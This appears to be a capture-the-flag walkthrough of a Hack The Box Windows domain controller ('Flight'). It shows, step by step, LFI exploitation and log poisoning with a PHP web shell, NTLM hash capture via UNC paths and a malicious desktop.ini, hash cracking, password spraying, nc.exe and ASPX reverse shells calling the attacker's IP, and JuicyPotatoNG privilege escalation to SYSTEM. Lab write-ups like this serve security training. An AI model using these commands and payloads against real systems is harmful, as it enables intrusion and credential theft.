Recon
Nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
|
└─$ nmap 10.10.11.187 -A -Pn -p- -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-14 00:09 CET
Nmap scan report for 10.10.11.187
Host is up (0.023s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: g0 Aviation
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-01-14 06:11:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: flight.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: G0; OS: Windows; CPE: cpe:/o:microsoft:windows
|
Here we face a Windows machine with an Airlines website.
Versions
Thanks to the nmap scan and Wappalyzer we can get version of Apache, PHP and OpenSSL:
- Apache 2.4.52
- PHP 8.1.1
- OpenSSL 1.1.1m
DNS
Using dig I try to found some subdomains.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
└─$ dig srv @10.10.11.187 flight.htb
; <<>> DiG 9.18.8-1-Debian <<>> srv @10.10.11.187 flight.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18784
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;flight.htb. IN SRV
;; AUTHORITY SECTION:
flight.htb. 3600 IN SOA g0.flight.htb. hostmaster.flight.htb. 41 900 600 86400 3600
;; Query time: 68 msec
;; SERVER: 10.10.11.187#53(10.10.11.187) (UDP)
;; WHEN: Sat Jan 14 00:18:28 CET 2023
;; MSG SIZE rcvd: 89
|
Trying DNS Zone Transfer:
1
2
3
4
5
|
└─$ dig axfr flight.htb @10.10.11.187
; <<>> DiG 9.18.8-1-Debian <<>> axfr flight.htb @10.10.11.187
;; global options: +cmd
; Transfer failed.
|
It failed.
Subdomain fuzzing
Then, I tried to fuzz subdomains
1
2
3
|
└─$ ffuf -w /usr/share/wordlists/subdomains-top1mil.txt -H "Host: FUZZ.flight.htb" -u http://10.10.11.187 -t 100 -fs 7069
school [Status: 200, Size: 3996, Words: 1045, Lines: 91, Duration: 282ms]
|
We get a new subdomain school.flight.htb.
Trying LFIs
The index.php of http://school.flight.htb/ has a view option that refers to pages. I tried LFis.
1
2
3
4
5
|
└─$ curl http://school.flight.htb/index.php?view=../
[...]
<h1>Suspicious Activity Blocked!<h3>Incident will be reported</h3>
[...]
|
LFIs seems to work. Let’s try with a wordlist. I tried with this wordlist.
1
2
3
4
5
6
7
8
|
└─$ ffuf -w file_inclusion_linux.txt -u "http://school.flight.htb/index.php?view=FUZZ" -t 100 -fs 1170,1102 -fc 500
/xampp/apache/conf/httpd.conf [Status: 200, Size: 22337, Words: 2849, Lines: 597, Duration: 44ms]
/xampp/php/php.ini [Status: 200, Size: 75093, Words: 9638, Lines: 2026, Duration: 52ms]
/xampp/sendmail/sendmail.ini [Status: 200, Size: 3198, Words: 431, Lines: 103, Duration: 200ms]
/xampp/phpMyAdmin/config.inc.php [Status: 200, Size: 3153, Words: 274, Lines: 92, Duration: 213ms]
/xampp/apache/logs/error.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 120ms]
/xampp/apache/logs/access.log [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 246ms]
|
AD Recon
List guest access
1
2
3
4
5
6
7
8
9
|
└─$ enum4linux -a -u "" -p "" 10.10.11.187 && enum4linux -a -u "guest" -p "" 10.10.11.187
[+] Server 10.10.11.187 allows sessions using username '', password ''
[E] Server doesn't allow session using username 'guest', password ''. Aborting remainder of tests.
# trying to list shares
└─$ impacket-smbclient 10.10.11.187
# shares
[-] SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
|
We got an acces denied :(
Users bruteforce via Kerberos Pre-Authentication
1
2
|
└─$ ./kerbrute -d flight.htb --dc 10.10.11.187 -t 100 usernames.txt
[+] VALID USERNAME: administrator@flight.htb
|
Using kerbrute we can’t find any users except Administrator account.
Path to the first shell
Trying to exploit logs
So, we have an access throught LFI to logs file of the website. Let’s try to poison logs to gain a shell access.
First, we check that our requests are logs into the file. I simply did a curl to the log file using LFI:
1
2
3
|
└─$ curl "http://school.flight.htb/index.php?view=/xampp/apache/logs/access.log"
10.10.16.7 - - [15/Jan/2023:12:50:58 -0800] "GET /index.php?view=/xampp/apache/logs/error.log HTTP/1.1" 200 83249 "-" "curl/7.86.0"
|
This confirm that our requests is well logged.
I manage to intercept a request to /xampp/apache/logs/access.log using burp. Then, I replace the User-Agent by this php payload: <?php system($_GET['cmd']); ?>
1
2
3
4
5
6
7
8
|
GET /index.php?view=/xampp/apache/logs/access.log HTTP/1.1
Host: school.flight.htb
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET['cmd']); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
|
Checking logs we see that our payload is on logs:
1
2
|
10.10.16.7 - - [15/Jan/2023:13:01:10 -0800] "GET /index.php?view=/xampp/apache/logs/access.log HTTP/1.1" 200 100727 "-" "<?php system($_GET['cmd']); ?>"
|
Then, we send the request. Our payload is now on the log file. We can check that our payload is working by sending commands throught it.
1
2
|
# sending a whoami command
└─$ curl "http://school.flight.htb/index.php?view=%2Fxampp%2Fapache%2Flogs%2Faccess%2Elog%26cmd%3Dwhoami"
|
Checking logs, the payload does not seems to work :(
Analyzing logs
Trying to do log poisoning I found weird requests on the log file. First, it make me think that it was another person’s requests. To check I restart the machine to check logs at the restart.
1
2
3
4
5
6
7
8
9
10
|
└─$ curl "http://school.flight.htb/index.php?view=/xampp/apache/logs/access.log"
[...]
192.168.22.245 - - [22/Sep/2022:13:34:56 -0700] "GET /index.php?view=data:,%3C?system($_GET[%27x%27]);?%3E&x=dir HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:34:56 -0700] "GET /index.php?view=data:,%3C?system($_GET[%27x%27]);?%3E&x=dir HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:00 -0700] "GET /index.php?view=\\\\\\\\192.168.22.248\\\\ HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:13 -0700] "GET /index.php?view=//192.168.22.248/asd HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:35:56 -0700] "GET /index.php?view=//192.168.22.249/share/a.php HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:36:01 -0700] "GET /index.php?view=//192.168.22.249/share/a.phar HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
192.168.22.245 - - [22/Sep/2022:13:45:39 -0700] "GET /index.php?view=//192.168.22.249/share/a.php HTTP/1.1" 200 27 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0"
|
Those logs are always here! Let’s try to replay them :)
So, I open an smb server using impacket and try request it.
1
2
3
4
5
6
7
8
9
10
11
12
13
|
└─$ ls
coucou.txt
# opening smb server
└─$ impacket-smbserver s . -smb2support
└─$ curl "http://school.flight.htb/index.php?view=//10.10.16.7/s/coucou.txt"
# checking smb server
[*] Incoming connection (10.10.11.187,49726)
[*] AUTHENTICATE_MESSAGE (flight\svc_apache,G0)
[*] User G0\svc_apache authenticated successfully
[*] svc_apache::flight:aaaaaaaaaaaaaaaa:a7d83728d25d2e033fdc56841b5c31ed:010100000000000080d2df7ef028d901bbcc4d0881b48f4500000000010010007a005600790065004400790073004900030010007a005600790065004400790073004900020010007000630077007700590046005300640004001000700063007700770059004600530064000700080080d2df7ef028d901060004000200000008003000300000000000000000000000003000000df8da0562b86bed46dbb09b63e186a3771b6773f709ca7aa349f37ec3c271330a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000
|
There we go, we got a connection from the machine!
I tried to bruteforce the NTLM hash using hashcat.
1
2
|
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
SVC_APACHE::flight:aaaaaaaaaaaaaaaa:a7d83728d25d2e033fdc56841b5c31ed:010100000000000080d2df7ef028d901bbcc4d0881b48f4500000000010010007a005600790065004400790073004900030010007a005600790065004400790073004900020010007000630077007700590046005300640004001000700063007700770059004600530064000700080080d2df7ef028d901060004000200000008003000300000000000000000000000003000000df8da0562b86bed46dbb09b63e186a3771b6773f709ca7aa349f37ec3c271330a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:S@Ss!K@*t13
|
We got our first credentials: svc_apache:S@Ss!K@*t13
Then, I tried to connect into the smb server to enum shares using our newly acquired creds.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
└─$ impacket-smbclient svc_apache@10.10.11.187
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password: S@Ss!K@*t13
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
Shared
SYSVOL
Users
Web
|
It works! We get multiple shares. I manage to dump shares to find users, passwords or any interesting information. I use DumpSMBShare from p0dalirius.
Exploring shares we found that Web is containing files from flight websites flight.htb & school.flight.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
|
└─$ tree -L 2 Web
Web
├── flight.htb
│ ├── css
│ ├── images
│ ├── index.html
│ └── js
└── school.flight.htb
├── about.html
├── blog.html
├── home.html
├── images
├── index.php
├── lfi.html
└── styles
|
But sadly, we don’t have right permissions on any shares.
Enumerate ldap
I managed to try to enumerate LDAP informations using bloodhound-python tool.
1
2
3
4
5
6
7
|
└─$ bloodhound-python -u svc_apache -p 'S@Ss!K@*t13' -d 'flight.htb' -c ALL -ns 10.10.11.187
INFO: Found AD domain: flight.htb
INFO: Connecting to LDAP server: g0.flight.htb
INFO: Connecting to LDAP server: g0.flight.htb
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 0 trusts
|
We found 16 users:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
└─$ cat 20230115170643_users.json | jq '.data[].Properties |"\(.name) --- \(.description)"'
"NT AUTHORITY@FLIGHT.HTB --- null"
"O.POSSUM@FLIGHT.HTB --- Helpdesk"
"SVC_APACHE@FLIGHT.HTB --- Service Apache web"
"D.TRUFF@FLIGHT.HTB --- Project Manager"
"I.FRANCIS@FLIGHT.HTB --- Nobody knows why he's here"
"W.WALKER@FLIGHT.HTB --- Payroll officer"
"C.BUM@FLIGHT.HTB --- Senior Web Developer"
"V.STEVENS@FLIGHT.HTB --- Secretary"
"M.GOLD@FLIGHT.HTB --- Sysadmin"
"G.LORS@FLIGHT.HTB --- Sales manager"
"L.KEIN@FLIGHT.HTB --- Penetration tester"
"R.COLD@FLIGHT.HTB --- HR Assistant"
"KRBTGT@FLIGHT.HTB --- Key Distribution Center Service Account"
"ADMINISTRATOR@FLIGHT.HTB --- Built-in account for administering the computer/domain"
"S.MOON@FLIGHT.HTB --- Junion Web Developer"
"GUEST@FLIGHT.HTB --- Built-in account for guest access to the computer/domain"
|
I managed to try to spray the password that we have with our new users.
1
2
3
4
5
|
└─$ crackmapexec -t 100 smb 10.10.11.187 -u users.txt -p 'S@Ss!K@*t13'
SMB 10.10.11.187 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.187 445 G0 [-] flight.htb\d.truff:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [-] flight.htb\i.francis:S@Ss!K@*t13 STATUS_LOGON_FAILURE
SMB 10.10.11.187 445 G0 [+] flight.htb\s.moon:S@Ss!K@*t13
|
We found that credentials s.moon:S@Ss!K@*t13 are working for SMB ! Maybe the user as write permissions on shares.
Using impacket-psexec we found that share Shared is writeable.
1
2
3
4
5
6
7
8
9
10
11
12
|
└─$ impacket-psexec s.moon@10.10.11.187
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.11.187.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[*] Found writable share Shared
[*] Uploading file FYmMQyHb.exe
[-] Error uploading file FYmMQyHb.exe, aborting.....
[-] Error performing the installation, cleaning up: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)
|
Steal NTLM hashes
After some research I found that we can write file with specific extensions and the files are deleted after a while. It means that there is probably a user that remove file from the shares. After reading the NTLM steal documentations from Hacktricks. I found that desktop.ini can be abuse to initiate a NTLM authentication with an attacker. To do so, I write the following desktop.ini file.
1
2
3
|
└─$ cat desktop.ini
[.ShellClassInfo]
IconResource=\\10.10.16.7\coucou
|
Then, I open a listener using Responder.
1
2
3
4
|
└─$ sudo responder -I tun0
[SMB] NTLMv2-SSP Client : 10.10.11.187
[SMB] NTLMv2-SSP Username : flight.htb\c.bum
[SMB] NTLMv2-SSP Hash : c.bum::flight.htb:9035fadb4a6b1c86:A2F9973E07164B3EC76620A67194F8C9:0101000000000000806DF8493A29D9018C547C6B1A12401D0000000002000800530051005600320001001E00570049004E002D004900480030003200480037004800510036004B00560004003400570049004E002D004900480030003200480037004800510036004B0056002E0053005100560032002E004C004F00430041004C000300140053005100560032002E004C004F00430041004C000500140053005100560032002E004C004F00430041004C0007000800806DF8493A29D901060004000200000008003000300000000000000000000000003000000DF8DA0562B86BED46DBB09B63E186A3771B6773F709CA7AA349F37EC3C271330A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000
|
And there it is ! We get a new hash from user c.bum !
Using hashcat we can retrieve the password.
1
2
|
└─$ hashcat -a 0 -m 5600 hash /usr/share/wordlists/rockyou.txt --quiet
C.BUM::flight.htb:9035fadb4a6b1c86:a2f9973e07164b3ec76620a67194f8c9:0101000000000000806df8493a29d9018c547c6b1a12401d0000000002000800530051005600320001001e00570049004e002d004900480030003200480037004800510036004b00560004003400570049004e002d004900480030003200480037004800510036004b0056002e0053005100560032002e004c004f00430041004c000300140053005100560032002e004c004f00430041004c000500140053005100560032002e004c004f00430041004c0007000800806df8493a29d901060004000200000008003000300000000000000000000000003000000df8da0562b86bed46dbb09b63e186a3771b6773f709ca7aa349f37ec3c271330a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:Tikkycoll_431012284
|
We now have new credentials: c.bum:Tikkycoll_431012284
We can get the user flag :)
1
2
3
4
|
└─$ impacket-smbclient c.bum@10.10.11.187
# use Users
# cat C.Bum\Desktop\user.txt
**************************a23826
|
We can get our shell by uploading a nc.exe and a php payload.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
# Uplod nc.exe and php payload
└─$ impacket-smbclient c.bum@10.10.11.187
# use Web
# cd school.flight.htb
# put /home/pezzz/HTB/boxtmp/e.php
# put /home/pezzz/HTB/pentest-tools/win-exploits/nc.exe
# PHP Payload
└─$ cat e.php
<?php system($_REQUEST['cmd']); ?>
# Create a reverse shell
└─$ curl "http://school.flight.htb/e.php?cmd=powershell%20-Command%20%22C:%5Cxampp%5Chtdocs%5Cschool.flight.htb%5Cnc.exe%2010.10.16.7%204444%20-e%20powershell%22"
# Listener
PS C:\xampp\htdocs\school.flight.htb> whoami
flight\svc_apache
|
Path to the privesc
c.bum user
Using RunasCs we can run specific processes with different permissions than the user’s current logon by provoviding explicit credentials. As we got c.bum password, I tried to execute command as c.bum.
To do so, we have to compile the binary on the host using .NET Framework csc.exe command. Then, try to execute command as c.bum.
1
2
3
4
5
6
7
8
9
|
# Upload RunasCs.cs on the machine from the share
# put /home/pezzz/HTB/pentest-tools/win-exploits/RunasCs/RunasCs.cs
# On the machine
PS C:\xampp\htdocs\school.flight.htb> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
PS C:\xampp\htdocs\school.flight.htb> .\RunasCs.exe c.bum Tikkycoll_431012284 whoami
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
flight\c.bum
|
It works! We can execute command as c.bum :)
We can now open a listener on our machine to get another reverse shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
C:\Windows\Temp\a>.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.16.7:4446
.\RunasCs.exe c.bum Tikkycoll_431012284 cmd.exe -r 10.10.16.7:4446
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5c2e9$\Default
[+] Async process 'cmd.exe' with pid 1752 created and left in background.
└─$ rlwrap nc -lvnp 4446
listening on [any] 4446 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 53536
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
flight\c.bum
|
After some research I did not find any way to privesc. Users haven’t any interesting privilege.
Exploiting local service
Analyzing open port using netstat, we found that there is as service running locally on port 8000. I open a chisel tunnel to have an access to the service on my machine.
1
2
3
4
5
6
7
8
9
10
11
|
C:\Windows\Temp\a>.\chisel_1.7.7_windows_amd64.exe client 10.10.16.7:2222 R:8000:127.0.0.1:8000
.\chisel_1.7.7_windows_amd64.exe client 10.10.16.7:2222 R:8000:127.0.0.1:8000
2023/01/16 20:56:16 client: Connecting to ws://10.10.16.7:2222
2023/01/16 20:56:16 client: Connected (Latency 15.4784ms)
└─$ ./chisel_1.7.7_linux_amd64 server -p 2222 --reverse
2023/01/16 22:55:18 server: Reverse tunnelling enabled
2023/01/16 22:55:18 server: Fingerprint hGrWRgzlN7QsnD/6nzcB1UzXZ6uyiSfa6/ARGBlZZdo=
2023/01/16 22:55:18 server: Listening on http://0.0.0.0:2222
2023/01/16 22:56:17 server: session#1: tun: proxy#R:8000=>8000: Listening
|
Tunnel is now mounted. We can now try to access the service from our machine.
Here we face a new website that is build with Microsoft ASP .NET Framework. Searching on the target we found that website files are located at C:\inetpub\development
I manage to upload an ASPX reverse shell on the target, at C:\inetpub\development\shell.aspx, to try to gain a reverse shell. Requesting the file and we get a new shell !
1
2
3
4
5
6
7
8
9
|
└─$ rlwrap nc -lvnp 4447
listening on [any] 4447 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.187] 49812
Spawn Shell...
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
|
We are now connected into iis apppool user. Checking privileges, we found that the user as SeImpersonatePrivilege. Maybe we can impersonate as Administrator.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
c:\windows\system32\inetsrv>whoami /priv
whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
|
Impersonate Administrator
With SeImpersonatePrivilege we can Impersonate user to escalate from a Windows service accounts to Nt Authority\System.
To do so, we can try to use RottenPotato or JuicyPotato exploit. I upload a binary on the target and try the impersonation.
1
2
3
4
5
6
7
|
c:\windows\system32\inetsrv>C:\Windows\Temp\b\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i
C:\Windows\Temp\b\JuicyPotatoNG.exe -t * -p "C:\windows\system32\cmd.exe" -i
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\>whoami
nt authority\system
|
It works ! We can get the root flag :)
